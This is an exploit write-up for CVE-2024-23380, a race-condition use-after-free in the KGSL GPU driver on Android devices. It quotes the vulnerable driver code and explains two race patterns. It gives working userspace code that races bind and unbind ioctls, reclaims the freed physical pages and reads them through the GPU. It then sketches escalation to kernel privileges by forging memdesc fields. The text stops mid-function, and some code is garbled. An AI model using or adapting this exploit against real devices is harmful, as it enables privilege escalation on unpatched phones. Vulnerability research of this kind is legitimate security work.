	*cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
	cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_ret);
	*cmds++ = magic;

	__clear_cache(cmds_start, cmds);
	usleep(10000);

	if (kgsl_gpu_command_n(fd, drawctxt_id, cmd_buffer_gpu_addr + offset_scratch,
			       (uintptr_t)(cmds) - (uintptr_t)(cmds_start), 1) == -1) {
		printf("gread8: gpu command failed\n");
		return -1;
	}

	// Poll until the GPU has written the marker
	volatile uint32_t *p = (volatile uint32_t *)(cmd_buffer + offset_ret);
	while (*p != magic) {
		usleep(10000);
		__clear_cache(cmd_buffer, cmd_buffer + 0x100000);
	}

	__clear_cache(cmd_buffer, cmd_buffer + 0x100000);
	memcpy(results, cmd_buffer + offset_value, 8 * count);
	return 0;
}
```

From Race Condition to UAF

This section focuses on the root cause of CVE-2024-23380 and on why a race in the KGSL “bind range” logic can be turned into a Use-After-Free.



In short, the UAF can be summarized as: a race in add_range breaks reference counting; later, freeing the object releases the underlying physical pages while a stale mapping is still kept.

Recap: what IOCTL_KGSL_GPUOBJ_ALLOC does

From the analysis in the KGSL memory model section, IOCTL_KGSL_GPUOBJ_ALLOC roughly performs:

- Allocate the requested physical pages.

- Allocate a virtual address range in the GPU virtual address space.

- Map the physical pages into the GPU VA range.

- Optionally mmap the memory into user space.

When allocating, different flags change the nature of the entry. If KGSL_MEMFLAGS_USE_CPU_MAP is set, the resulting object is a “normal” GPU buffer: the GPU VA ↔ PA mapping and the user-space mapping are all backed by the same physical pages.



VBO allocations (KGSL_MEMFLAGS_VBO) and zero-page backing

Besides the normal allocation (KGSL_MEMFLAGS_USE_CPU_MAP), IOCTL_KGSL_GPUOBJ_ALLOC also supports a special flag: KGSL_MEMFLAGS_VBO.

By reading the driver code, we can see that when this flag is used, the GPU object is created without allocating real physical backing pages; instead, the driver uses the zero page as a placeholder.

The IOCTL is still IOCTL_KGSL_GPUMEM_ALLOC or IOCTL_KGSL_GPUOBJ_ALLOC, but the flag becomes:

flag = KGSL_MEMFLAGS_VBO

Binding ranges: IOCTL_KGSL_GPUMEM_BIND_RANGES

When using IOCTL_KGSL_GPUMEM_BIND_RANGES, the driver calls kgsl_sharedmem_create_bind_op. Depending on the parameters, it will choose either:

- kgsl_memdesc_add_range (KGSL_GPUMEM_RANGE_OP_BIND), or
- kgsl_memdesc_remove_range (KGSL_GPUMEM_RANGE_OP_UNBIND).





If we choose add_range, we can bind a VBO entry (kgsl_vbo_entry, currently backed by the zero page) to another GPU allocation that has real backing pages (a normal kgsl_mem_entry).

Conceptually, add_range contains two parts:

- Bind the mem_entry to the vbo_entry at the software level (GPU VA bookkeeping via the ranges interval tree).
- Bind the physical pages into the VBO’s GPU page table mapping.

After binding, kgsl_vbo_entry can read/write the physical pages of the bound entries (e.g., kgsl_mem_entry_A and kgsl_mem_entry_B) through its gpu_addr.

Because a single physical allocation is now “shared” by multiple management objects, KGSL uses refcount to track how many places hold references to a given kgsl_mem_entry. Before remove_range happens, a referenced child entry (e.g. entry_A) cannot be freed by user space.

If we choose kgsl_memdesc_remove_range, the operation is reversed:

- First unmap the VBO’s GPU VA → PA mapping.
- Remove the vbo_entry ↔ entry_A/entry_B software bindings.
- Finally, make the VBO range point back to the zero page.
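The bind/unbind bookkeeping and its effect on the child’s lifetime can be modeled in a few dozen lines. This is a simplified, hypothetical model, not KGSL code: a VBO is a small array of page-table slots that start out pointing at the zero page, each bind records a range and takes a reference on the child, and each unbind follows the three steps listed above. It ignores overlapping ranges and the temporary reference the bind worker holds on each op entry.

```c
#include <assert.h>

#define VBO_PAGES        8
#define MAX_RANGES       4
#define ZERO_PAGE_FRAME  (-1)   /* sentinel: the shared zero page */
#define UNMAPPED         (-2)   /* sentinel: no GPU mapping at all */

struct child {
	int refcount;
	int first_frame;            /* backing frames: first_frame, first_frame + 1, ... */
};

struct range {
	int used;
	int start, last;            /* inclusive VBO page interval */
	struct child *entry;
};

struct vbo {
	int gpu_pte[VBO_PAGES];     /* GPU page table: VBO page -> physical frame */
	struct range ranges[MAX_RANGES];
};

static void vbo_init(struct vbo *v)
{
	for (int p = 0; p < VBO_PAGES; p++)
		v->gpu_pte[p] = ZERO_PAGE_FRAME;
	for (int i = 0; i < MAX_RANGES; i++)
		v->ranges[i].used = 0;
}

static int vbo_bind(struct vbo *v, int start, int last, struct child *c, int child_off)
{
	assert(0 <= start && start <= last && last < VBO_PAGES);
	for (int i = 0; i < MAX_RANGES; i++) {
		if (v->ranges[i].used)
			continue;
		c->refcount++;                                   /* the range pins the child */
		v->ranges[i] = (struct range){ 1, start, last, c };
		for (int p = start; p <= last; p++)
			v->gpu_pte[p] = c->first_frame + child_off + (p - start);
		return 0;
	}
	return -1;                                           /* no free bookkeeping slot */
}

static void vbo_unbind(struct vbo *v, int start, int last, struct child *c)
{
	assert(0 <= start && start <= last && last < VBO_PAGES);
	for (int p = start; p <= last; p++)
		v->gpu_pte[p] = UNMAPPED;                        /* 1. unmap GPU VA -> PA */
	for (int i = 0; i < MAX_RANGES; i++) {               /* 2. drop software binding */
		struct range *r = &v->ranges[i];
		if (r->used && r->entry == c && r->start == start && r->last == last) {
			r->used = 0;
			c->refcount--;
		}
	}
	for (int p = start; p <= last; p++)
		v->gpu_pte[p] = ZERO_PAGE_FRAME;                 /* 3. back to the zero page */
}
```

Binding VBO pages 2..4 to a child whose frames start at 100 maps page 3 to frame 101 and raises the child’s count to 2. Dropping the owner’s reference (the user-space free) leaves it at 1, so the child survives until the unbind releases the range’s reference and the slots return to the zero page.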

A relevant worker function is:

static void kgsl_sharedmem_bind_worker(struct work_struct *work)

{

struct kgsl_sharedmem_bind_op *op = container_of(work,

struct kgsl_sharedmem_bind_op, work);

int i;

for (i = 0; i < op->nr_ops; i++) {

if (op->ops[i].op == KGSL_GPUMEM_RANGE_OP_BIND)

kgsl_memdesc_add_range(op->target,

op->ops[i].start,

op->ops[i].last,

op->ops[i].entry,

op->ops[i].child_offset);

else

kgsl_memdesc_remove_range(op->target,

op->ops[i].start,

op->ops[i].last,

op->ops[i].entry);

/* Release the reference on the child entry */

kgsl_mem_entry_put(op->ops[i].entry);

op->ops[i].entry = NULL;



}What the patch changes (why kgsl_mmu_map_child matters)

Looking at the vendor patch for this vulnerability, we can see the bug sits in kgsl_memdesc_add_range. The fix is to move kgsl_mmu_map_child under the mutex_lock protection.

That is the key point: kgsl_mmu_map_child was previously executed outside of the lock, leaving a race window that allows the page table update to happen after the corresponding child entry is already logically unbound / refcount-dropped.

Patch diff:

So let’s break down what kgsl_memdesc_add_range (and the kgsl_mmu_map_child it calls) actually does.

kgsl_memdesc_add_range step-by-step

Parameters:

- target: vbo_entry (currently pointing to the zero page)
- start, last: GPU virtual address range
- entry: a child mem_entry that has real physical backing

Flow:

Call bind_range_create(start, last, entry) to create a new bind-range node and take a reference on the child:

- Allocate a kgsl_memdesc_bind_range.
- Fill range.start/last.
- Set range->entry = entry.
- Call kgsl_mem_entry_get(entry) (kref +1).

static struct kgsl_memdesc_bind_range *bind_range_create(u64 start, u64 last,

struct kgsl_mem_entry *entry)

{

struct kgsl_memdesc_bind_range *range =

kzalloc(sizeof(*range), GFP_KERNEL);

if (!range)

return ERR_PTR(-ENOMEM);

range->range.start = start;

range->range.last = last;

range->entry = kgsl_mem_entry_get(entry);

if (!range->entry) {

kfree(range);

return ERR_PTR(-EINVAL);

}

return range;

}For safety, unmap the entire GPU VA range first using

kgsl_mmu_unmap_range(pagetable, memdesc, start, len). This clears the PTEs for[start, start+len)in the target page table, i.e., removes the current GPU VA → PA mapping.Iterate and merge overlapping nodes in the interval tree:

next = interval_tree_iter_first(&memdesc->ranges, start, last). If an old range is removed/replaced, its referencedcur->entrywill be put (refcount--).Insert the new range into the interval tree:

interval_tree_insert(&range->range, &memdesc->ranges). Now the software bookkeeping records:[start,last] -> entry.Unlock the mutex (

mutex_unlock).Finally, call:

kgsl_mmu_map_child(memdesc->pagetable, memdesc, start, &entry->memdesc, offset, last - start + 1)

This updates the GPU page table so that GPU VA [start,last] maps to the child entry’s physical pages.

- Address space:

memdesc->pagetable(the GPU page table / SMMU context for the target). - GPU VA range: from

start, lengthlen = last-start+1. - Physical source: the physical pages described by

entry->memdesc. - Offset: start from the child

offset.
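The overlap handling in add_range boils down to four cases. The sketch below is a hypothetical helper, not driver code: it mirrors the if/else branches of kgsl_memdesc_add_range for one old range that overlaps the new bind, and assumes the caller already knows the two ranges overlap. Only DROP_OLD puts the old child's reference (kgsl_mem_entry_put), which is the path race method 2 relies on; SPLIT_OLD instead takes an extra reference for the new far-side node.

```c
#include <assert.h>
#include <stdint.h>

/* What happens to an existing bound range when a new bind overlaps it. */
enum overlap_action {
	DROP_OLD,       /* new range covers the old one: put old entry, free node */
	TRIM_OLD_FRONT, /* old range keeps its tail: cur.start = last + 1 */
	TRIM_OLD_BACK,  /* old range keeps its head: cur.last = start - 1 */
	SPLIT_OLD       /* old range keeps head and tail: extra node, extra get */
};

/* Hypothetical helper mirroring the branches in kgsl_memdesc_add_range.
 * [start, last] is the new bind, [cur_start, cur_last] the old range. */
static enum overlap_action classify_overlap(uint64_t start, uint64_t last,
					    uint64_t cur_start, uint64_t cur_last)
{
	assert(start <= cur_last && cur_start <= last); /* ranges must overlap */

	if (start <= cur_start)
		return last >= cur_last ? DROP_OLD : TRIM_OLD_FRONT;
	return last < cur_last ? SPLIT_OLD : TRIM_OLD_BACK;
}
```

For example, rebinding exactly the same range (start == cur_start, last == cur_last) yields DROP_OLD, while binding a range strictly inside an existing one yields SPLIT_OLD.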

So the core can be summarized in two steps:

- STEP1 (software link): establish the formal link between the VBO and the child entry via the interval tree (vbo -> GPU VA bookkeeping).
- STEP2 (page-table link): modify the GPU page table so that the VBO’s GPU VA range maps to the child’s physical pages (vbo -> PA mapping).

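The problem is exactly that STEP2 was not protected by the mutex in the vulnerable version. Between mutex_unlock and kgsl_mmu_map_child, another thread can remove the binding that STEP1 just created and drop the reference it held. STEP2 then installs a page-table mapping that no interval-tree node accounts for, so nothing will ever unmap it. Once the last reference to the child kgsl_mem_entry is dropped, its physical pages are freed while the VBO’s GPU VA still maps them: a classic Use-After-Free primitive.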
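To make the ordering argument concrete, here is a toy, single-threaded replay of race method 1. Nothing in it is KGSL code: struct vbo_model and its helpers are hypothetical stand-ins that only track the child's reference count, the interval-tree binding (STEP1) and the page-table mapping (STEP2). The worker's own temporary reference on the child is left out because it is dropped as soon as add_range returns. Replaying the interleaving with STEP2 outside the lock ends with a mapping to freed pages; moving STEP2 inside the critical section, as the patch does, forces remove_range to run after the map and undo it.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy model of one child entry bound into one VBO range (not KGSL code). */
struct vbo_model {
	int  child_refs;  /* references on the child (user handle + tree node) */
	bool child_freed; /* set when child_refs drops to zero */
	bool tree_bound;  /* STEP1: interval-tree node vbo -> child exists */
	bool pte_mapped;  /* STEP2: GPU page table maps vbo VA -> child pages */
};

static void put_child(struct vbo_model *m)
{
	if (--m->child_refs == 0)
		m->child_freed = true; /* pages go back to the allocator */
}

/* add_range, part under ranges_lock: get ref, unmap, insert tree node. */
static void add_step1(struct vbo_model *m)
{
	m->child_refs++;
	m->pte_mapped = false;
	m->tree_bound = true;
}

/* add_range, kgsl_mmu_map_child(): install the page-table mapping. */
static void add_step2(struct vbo_model *m)
{
	m->pte_mapped = true;
}

/* remove_range: runs entirely under ranges_lock. */
static void remove_range(struct vbo_model *m)
{
	if (!m->tree_bound)
		return;            /* nothing recorded in the tree to unbind */
	m->pte_mapped = false; /* unmap (then zero page) */
	m->tree_bound = false; /* interval_tree_remove() */
	put_child(m);          /* bind_range_destroy() */
}

/* Replays thread1 = bind, thread2 = unbind, main = free. */
static struct vbo_model replay_method1(bool map_inside_lock)
{
	struct vbo_model m = { .child_refs = 1 }; /* user's own handle */

	add_step1(&m);          /* thread1: bind child (refcount++) */
	if (map_inside_lock) {
		add_step2(&m);      /* patched: map before unlocking */
		remove_range(&m);   /* thread2 has to wait for the lock */
	} else {
		remove_range(&m);   /* thread2 runs inside the race window */
		add_step2(&m);      /* thread1's late kgsl_mmu_map_child() */
	}
	put_child(&m);          /* main: IOCTL_KGSL_GPUOBJ_FREE */
	return m;
}

static bool is_uaf(const struct vbo_model *m)
{
	return m->pte_mapped && m->child_freed;
}
```

replay_method1(false) models the vulnerable driver and replay_method1(true) the patched one; is_uaf() reports whether the VBO still maps the child's pages after they were freed.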

The relevant code:

```c
static int kgsl_memdesc_add_range(struct kgsl_mem_entry *target,
		u64 start, u64 last, struct kgsl_mem_entry *entry, u64 offset)
{
	struct interval_tree_node *node, *next;
	struct kgsl_memdesc *memdesc = &target->memdesc;
	struct kgsl_memdesc_bind_range *range =
		bind_range_create(start, last, entry); // create a new range node and refcount++

	if (IS_ERR(range))
		return PTR_ERR(range);

	mutex_lock(&memdesc->ranges_lock);

	/*
	 * Unmap the range first. This increases the potential for a page fault
	 * but is safer in case something goes bad while updating the interval
	 * tree
	 */
	kgsl_mmu_unmap_range(memdesc->pagetable, memdesc, start,
		last - start + 1); // unmap GPU VA -> PA first (safety)

	next = interval_tree_iter_first(&memdesc->ranges, start, last); // interval tree lookup

	while (next) {
		struct kgsl_memdesc_bind_range *cur;

		node = next;
		cur = bind_to_range(node);
		next = interval_tree_iter_next(node, start, last);

		trace_kgsl_mem_remove_bind_range(target, cur->range.start,
			cur->entry, bind_range_len(cur));

		interval_tree_remove(node, &memdesc->ranges);

		// Decide whether to delete/trim/split the old range, and whether to put/get the old entry.
		if (start <= cur->range.start) {
			if (last >= cur->range.last) {
				kgsl_mem_entry_put(cur->entry); // drop bind: refcount--
				kfree(cur);
				continue;
			}

			/* Adjust the start of the mapping */
			cur->range.start = last + 1;
			/* And put it back into the tree */
			interval_tree_insert(node, &memdesc->ranges);

			trace_kgsl_mem_add_bind_range(target,
				cur->range.start, cur->entry, bind_range_len(cur));
		} else {
			if (last < cur->range.last) {
				struct kgsl_memdesc_bind_range *temp;

				/*
				 * The range is split into two so make a new
				 * entry for the far side
				 */
				temp = bind_range_create(last + 1, cur->range.last,
					cur->entry); // split: refcount++
				/* FIXME: Uhoh, this would be bad */
				BUG_ON(IS_ERR(temp));

				interval_tree_insert(&temp->range,
					&memdesc->ranges);

				trace_kgsl_mem_add_bind_range(target,
					temp->range.start,
					temp->entry, bind_range_len(temp));
			}

			cur->range.last = start - 1;
			interval_tree_insert(node, &memdesc->ranges);

			trace_kgsl_mem_add_bind_range(target, cur->range.start,
				cur->entry, bind_range_len(cur));
		}
	}

	/* Add the new range */
	interval_tree_insert(&range->range, &memdesc->ranges);

	trace_kgsl_mem_add_bind_range(target, range->range.start,
		range->entry, bind_range_len(range));
	mutex_unlock(&memdesc->ranges_lock);

	// STEP2 runs after the lock is dropped: this is the race window the patch closes
	return kgsl_mmu_map_child(memdesc->pagetable, memdesc, start,
			&entry->memdesc, offset, last - start + 1);
}
```

At this point, even without analyzing kgsl_memdesc_remove_range in depth, we can already see how the bug is triggered. The two race patterns below are still both instructive, so here is kgsl_memdesc_remove_range for reference:

```c
static void kgsl_memdesc_remove_range(struct kgsl_mem_entry *target,
		u64 start, u64 last, struct kgsl_mem_entry *entry)
{
	struct interval_tree_node *node, *next;
	struct kgsl_memdesc_bind_range *range;
	struct kgsl_memdesc *memdesc = &target->memdesc;

	mutex_lock(&memdesc->ranges_lock);

	next = interval_tree_iter_first(&memdesc->ranges, start, last);
	while (next) {
		node = next;
		range = bind_to_range(node);
		next = interval_tree_iter_next(node, start, last);

		/*
		 * If entry is null, consider it as a special request. Unbind
		 * the entire range between start and last in this case.
		 */
		if (!entry || range->entry->id == entry->id) {
			if (kgsl_mmu_unmap_range(memdesc->pagetable,
				memdesc, range->range.start, bind_range_len(range)))
				continue;

			interval_tree_remove(node, &memdesc->ranges);
			trace_kgsl_mem_remove_bind_range(target,
				range->range.start, range->entry,
				bind_range_len(range));

			kgsl_mmu_map_zero_page_to_range(memdesc->pagetable,
				memdesc, range->range.start, bind_range_len(range));

			bind_range_destroy(range); // refcount--
		}
	}

	mutex_unlock(&memdesc->ranges_lock);
}
```

Summary:

- Find the nodes in target->memdesc.ranges that overlap [start,last] and belong to the given child entry (or all of them when entry is NULL).
- Unmap VA→PA first using kgsl_mmu_unmap_range (undo STEP2). If the unmap fails, skip that node without touching the software state.
- Remove the node from the interval tree (undo STEP1), remap the VA range to the zero page, and finally drop the child entry’s reference via bind_range_destroy(range) (put, refcount--).

Two race patterns





There are two race patterns. The key idea in both is: after the VBO has (briefly) held a reference to a child entry, kgsl_mmu_map_child is triggered later and ends up re-mapping freed physical pages into the VBO’s GPU VA range.

Race condition method 1

Running add_range and remove_range concurrently on the same vbo_entry and the same child_entry can trigger the bug.

Conceptually, in thread2 the refcount of child_entry is decremented (so it becomes eligible for freeing), but due to the race window thread1 later executes kgsl_mmu_map_child and binds the physical pages into vbo_entry.

| thread1 | thread2 | main |
|---|---|---|
| bind_range | remove_range | |
| 1. bind child_entry to vbo_entry (refcount++) | | |
| | 2. unmap vbo_entry’s VA→PA (ineffective because of the later map) | |
| | 3. unbind child_entry from vbo_entry (refcount--) | |
| 4. kgsl_mmu_map_child maps child_entry pages into vbo_entry | | |
| | | free child_entry → pages freed → UAF |

Why does the GPU still access child_entry pages after we “removed the binding”? Because the “binding” removal refers to the software relationship in the interval tree (range->entry). The GPU access path relies on the page table VA→PA mapping, and kgsl_mmu_map_child operates on the page table.

Reference code:

vbo_entry can only be accessed through gpu_addr. For how to use gpu_addr, see the “GPU Development Basics” section. The code below races remove_range and add_range between id1 (child_entry) and id3 (vbo_entry):

int id1, id2, id3, id4;

uint64_t alloc_size = PAGE_CNT * 0x1000;

// alloc obj1

id1 = kgsl_gpu_alloc(fd, KGSL_MEMFLAGS_USE_CPU_MAP, alloc_size);

if (id1 < 0)

return -1;

void *cpu_mmap1 = mmap(0, alloc_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, id1 * 0x1000);

if (cpu_mmap1 == (void *)-1) {

perror("[-] cpu_buffer mmap failed");

return -1;

}

debug("cpu_mmap1 %p\n", cpu_mmap1);

memset(cpu_mmap1, 'A', alloc_size);

//alloc vbo obj

id3 = kgsl_gpu_alloc(fd, KGSL_MEMFLAGS_VBO, alloc_size); // vbo_entry id

if (id3 < 0)

return -1;

gpu_addr = kgsl_get_info(fd, id3); // vbo_entry can only be accessed via gpu_addr

if (!gpu_addr)

return -1;

// race

pthread_t t1;

struct bind_arguments bind_args;

bind_args.fd = fd;

bind_args.alloc_size = alloc_size;

bind_args.obj_id = id1;//id2;

bind_args.vbo_id = id3;

pthread_create(&t1, NULL, bind_proc, &bind_args);// remove_range

struct kgsl_gpumem_bind_ranges bind_ranges;

struct kgsl_gpumem_bind_range range;

memset(&bind_ranges, 0, sizeof(bind_ranges));

memset(&range, 0, sizeof(range));

bind_ranges.ranges = (uint64_t)⦥

bind_ranges.ranges_nents = 1;

bind_ranges.ranges_size = sizeof(range);

bind_ranges.id = id3;

range.child_offset = 0;

range.target_offset = 0;

range.length = alloc_size;

range.child_id = id1;

range.op = KGSL_GPUMEM_RANGE_OP_BIND;// add_range

while (!step);

step = 0;

if (ioctl(fd, IOCTL_KGSL_GPUMEM_BIND_RANGES, &bind_ranges)) {

perror("[-] ioctl IOCTL_KGSL_GPUMEM_BIND_RANGES failed");

return -1;

}

sleep(1);

// free

if (munmap(cpu_mmap1, alloc_size)) {

perror("[-] munmap failed");

return -1;

}

struct kgsl_gpuobj_free free_obj;

memset(&free_obj, 0, sizeof(free_obj));

free_obj.id = id1;

if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_obj)) {

perror("[-] ioctl IOCTL_KGSL_GPUOBJ_FREE failed");

return -1;

}

// occupy

id4 = kgsl_gpu_alloc(fd, KGSL_MEMFLAGS_USE_CPU_MAP, alloc_size);

if (id4 < 0)

return -1;

void *cpu_mmap4 = mmap(0, alloc_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, id4 * 0x1000);

if (cpu_mmap4 == (void *)-1) {

perror("[-] cpu_buffer mmap failed");

return -1;

}

debug("cpu_mmap4 %p\n", cpu_mmap4);

memset(cpu_mmap4, 'D', alloc_size);

int found = 0;

uint64_t *results = calloc(PAGE_CNT, sizeof(uint64_t));

if (gpu_read8n(gpu_addr, PAGE_CNT, results) < 0) {

err("read8n failed\n");

return -1;

}



for (uint64_t i = 0; i < PAGE_CNT; ++i) {

uint64_t res = results[i];

if (res == 0x4444444444444444) {

found = 1;

debug("!!!!!! gpu read %lx: %lx\n", gpu_addr + i * 0x1000, res);

break;

}

}

free(results);Thread function executing remove_range:

```c
void *bind_proc(void *args)
{
    struct bind_arguments *bind_args = (struct bind_arguments *)args;
    struct kgsl_gpumem_bind_ranges bind_ranges;
    struct kgsl_gpumem_bind_range range;

    memset(&bind_ranges, 0, sizeof(bind_ranges));
    memset(&range, 0, sizeof(range));
    bind_ranges.ranges = (uint64_t)&range;
    bind_ranges.ranges_nents = 1;
    bind_ranges.ranges_size = sizeof(range);
    bind_ranges.id = bind_args->vbo_id;
    range.child_offset = 0;
    range.target_offset = 0;
    range.length = bind_args->alloc_size;
    range.child_id = bind_args->obj_id;
    range.op = KGSL_GPUMEM_RANGE_OP_UNBIND; // remove_range

    step = 1;      // tell the main thread we are ready
    while (step);  // wait for the main thread's go signal

    if (ioctl(bind_args->fd, IOCTL_KGSL_GPUMEM_BIND_RANGES, &bind_ranges)) {
        perror("[-] ioctl IOCTL_KGSL_GPUMEM_BIND_RANGES failed");
    }
    pthread_exit(0);
}
```

GPU read via gpu_addr (note: it reads only the first 8 bytes of every 4096-byte page):

```c
// Returns int (the original declared a const uint64_t return type), so that
// the caller's "< 0" error check can actually fire.
static int gpu_read8n(uint64_t addr, size_t count, void *results)
{
    assert(count <= 0x3000);
    const uint32_t magic = rand();
    size_t offset_scratch = 0x10;
    size_t offset_ret = offset_scratch + 0xd0000;
    size_t offset_value = offset_scratch + 0xd0000 + 8;
    uint32_t *cmds_start = (uint32_t *)(cmd_buffer + offset_scratch);
    uint32_t *cmds = cmds_start;

    // For page i, copy the first 8 bytes at addr + i*0x1000 into result slot i,
    // as two 4-byte CP_MEM_TO_MEM copies (destination first, then source).
    for (size_t i = 0; i < count; i++) {
        *cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
        *cmds++ = 0;
        cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_value + i * 8);
        cmds += cp_gpuaddr(cmds, addr + i * 0x1000);
        *cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);
        *cmds++ = 0;
        cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_value + i * 8 + 4);
        cmds += cp_gpuaddr(cmds, addr + i * 0x1000 + 4);
    }
    // Write the magic value last; the CPU polls for it to know the GPU is done.
    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
    cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_ret);
    *cmds++ = magic;

    __clear_cache(cmds_start, cmds);
    usleep(10000);
    if (kgsl_gpu_command_n(fd, drawctxt_id, cmd_buffer_gpu_addr + offset_scratch, (uintptr_t)(cmds) - (uintptr_t)(cmds_start), 1) == -1) {
        printf("gread8: gpu command");
        getchar();
        return -1;
    }

    volatile uint32_t *p = (volatile uint32_t *)(cmd_buffer + offset_ret);
    for (int i = 0; *p != magic; i++) {
        //printf("%d\n", *p);
        usleep(10000);
        // fprintf(stderr, "gread %#x...\n", *p);
        __clear_cache(cmd_buffer, cmd_buffer + 0x100000);
    }
    __clear_cache(cmd_buffer, cmd_buffer + 0x100000);
    memcpy(results, cmd_buffer + offset_value, 8 * count);
    return 0;
}
```

Race condition method 2

The idea is similar: calling add_range concurrently on the same vbo_entry for child_entry1 and child_entry2 can also trigger the bug.

Because add_range may take the “remove existing range” path, a concurrent bind can free the other thread’s freshly created binding metadata and drop the reference it holds before that thread has mapped its child.

The code path that drops an existing bind in add_range:

```c
if (start <= cur->range.start) {
	if (last >= cur->range.last) {
		kgsl_mem_entry_put(cur->entry); // drop the bind: refcount -1
		kfree(cur);
		continue;
	}
	/* ... */
}
```

When two threads call add_range concurrently for vbo->child_entry1 and vbo->child_entry2, the later bind_range may release the earlier thread’s binding (child_entry1 refcount -1), but this does not prevent both threads from executing kgsl_mmu_map_child afterwards. As a result, child_entry1’s physical pages can still be mapped into vbo_entry even after its refcount drops to zero.

| thread1 | thread2 | main |
|---|---|---|
| bind_range(child_entry1) | bind_range(child_entry2) | |
| 1. bind child_entry1 to vbo_entry (refcount++) | | |
| | 2. find the existing range, remove it (child_entry1 refcount -1) | |
| | 3. bind child_entry2 to vbo_entry (ignore) | |
| 4. kgsl_mmu_map_child maps child_entry1 physical pages into vbo_entry | | |
| | 5. kgsl_mmu_map_child maps child_entry2 physical pages into vbo_entry (ignore) | |
| | | free child_entry1 → physical pages freed → UAF |
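The same kind of toy replay works for method 2. Again, struct m2 and its helpers are hypothetical stand-ins, not driver code. Both binds are assumed to cover the same GPU VA range, so thread2's add_range takes the DROP path on thread1's node; thread2's own kgsl_mmu_map_child, which the table marks as ignorable, is left out. The end state shows the interval tree and the page table disagreeing: the tree records child 2, while the page table still points at child 1, whose refcount has reached zero.

```c
#include <assert.h>

/* Toy model of race method 2: two binds on the same VBO range (not KGSL code). */
struct m2 {
	int refs[3];    /* refs[1], refs[2]: references on child 1 and child 2 */
	int freed[3];   /* 1 once a child's refcount reaches zero */
	int tree_child; /* child recorded in the interval tree (0 = none) */
	int pte_child;  /* child whose pages the page table maps (0 = none) */
};

static void put(struct m2 *m, int c)
{
	if (--m->refs[c] == 0)
		m->freed[c] = 1;
}

/* add_range under ranges_lock: get a ref, unmap, drop the fully covered
 * old node (kgsl_mem_entry_put on its child), insert the new node. */
static void bind_step1(struct m2 *m, int c)
{
	m->refs[c]++;
	m->pte_child = 0;
	if (m->tree_child)
		put(m, m->tree_child);
	m->tree_child = c;
}

/* add_range after mutex_unlock: kgsl_mmu_map_child(). */
static void bind_step2(struct m2 *m, int c)
{
	m->pte_child = c;
}

static struct m2 replay_method2(void)
{
	struct m2 m = { .refs = {0, 1, 1} }; /* user handles on both children */

	bind_step1(&m, 1); /* thread1: bind child1 (refcount++) */
	bind_step1(&m, 2); /* thread2: drops child1's node (child1 refcount -1) */
	bind_step2(&m, 1); /* thread1: late map of child1 */
	put(&m, 1);        /* main: free child1 */
	return m;
}
```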



With either of the two methods above, we eventually gain control of a range of freed physical pages through gpu_addr.

Reusing the Original Soup: Privilege Escalation Using KGSL Itself

The ultimate goal of kernel exploitation is privilege escalation. Achieving it usually requires modifying sensitive kernel data, so the key question is how to turn the current Use-After-Free into a controllable write (preferably an arbitrary-address write).

Many exploits take a traditional kernel exploitation route (modifying PTEs, Dirty Pipe, etc.). The most elegant part of this exploit is that the final arbitrary-address write can be built from KGSL’s own data structures, which amounts to “using KGSL to attack KGSL”: literally, reusing the original soup.

Let’s review the object relationship: kgsl_memdesc is embedded in kgsl_mem_entry in the memory layout (we can approximately treat them as an integrated object). This means that once we can replace/reuse kgsl_mem_entry in a UAF scenario, we have the opportunity to affect its internal memdesc fields, thereby controlling mapping behavior.

The fundamental reasons KGSL is suitable for exploitation:

- Easy heap spraying: allocating a gpuobj creates a kgsl_mem_entry, and both the number and the layout of these objects are relatively controllable.
- High-value fields: once fields such as physaddr/size in kgsl_memdesc are controllable, they can be used to build the capability of “mapping arbitrary physical addresses”, laying the foundation for arbitrary writes.
- Easy to locate: by setting metadata as a memory marker, you can improve the odds of locating/identifying the target kgsl_mem_entry in the heap.
- ops can be used as an exploitation lever: kgsl_memdesc also contains const struct kgsl_memdesc_ops *ops, a table of function pointers that abstracts the implementation differences between memory backends. When the driver performs critical actions such as mapping/unmapping/freeing, it often calls ops->xxx indirectly.



Although physaddr and size are now controllable, modifying them does not immediately change any existing physical mapping, because page-table mappings are usually only updated at specific moments, such as when a mapping is established or a page fault is handled. We therefore still need a controllable trigger that makes the driver map again using the forged memdesc parameters.

In this vulnerability scenario, memdesc->ops is also controllable (it can be tampered with). If we point memdesc->ops at kgsl_contiguous_ops, we gain a critical trigger path: when user space touches the mapped area of this object and triggers a page fault (vmfault), the kernel enters kgsl_contiguous_vmfault. There, the driver calls vmf_insert_pfn to establish the page mapping, and the PFN/range parameters it uses come from memdesc->physaddr and memdesc->size, fields we already control.
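The ops lever is an ordinary function-pointer table, so its effect can be shown with a simplified userspace model. Everything below is a hypothetical illustration: toy_memdesc only mirrors the ops/physaddr/size fields of kgsl_memdesc, and toy_contiguous_vmfault assumes a contiguous backend derives the PFN as (physaddr >> PAGE_SHIFT) plus the page index of the fault, with a simple bounds check against size. It is not the driver's actual fault handler. Swapping md->ops from the page-array table to the contiguous table makes the same fault resolve to a PFN computed purely from physaddr.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_PAGE_SHIFT 12

struct toy_memdesc;

/* Function-pointer table in the spirit of struct kgsl_memdesc_ops. */
struct toy_memdesc_ops {
	/* Returns the PFN to insert for a fault at byte offset off, or 0 on error. */
	uint64_t (*vmfault)(const struct toy_memdesc *md, uint64_t off);
};

struct toy_memdesc {
	const struct toy_memdesc_ops *ops;
	uint64_t physaddr;         /* used by the contiguous backend */
	uint64_t size;
	const uint64_t *page_pfns; /* used by the page-array backend */
};

/* Page-array backend: the PFN comes from the object's own page list. */
static uint64_t toy_page_vmfault(const struct toy_memdesc *md, uint64_t off)
{
	if (off >= md->size)
		return 0;
	return md->page_pfns[off >> TOY_PAGE_SHIFT];
}

/* Contiguous backend: the PFN is derived from physaddr alone. */
static uint64_t toy_contiguous_vmfault(const struct toy_memdesc *md, uint64_t off)
{
	if (off >= md->size)
		return 0;
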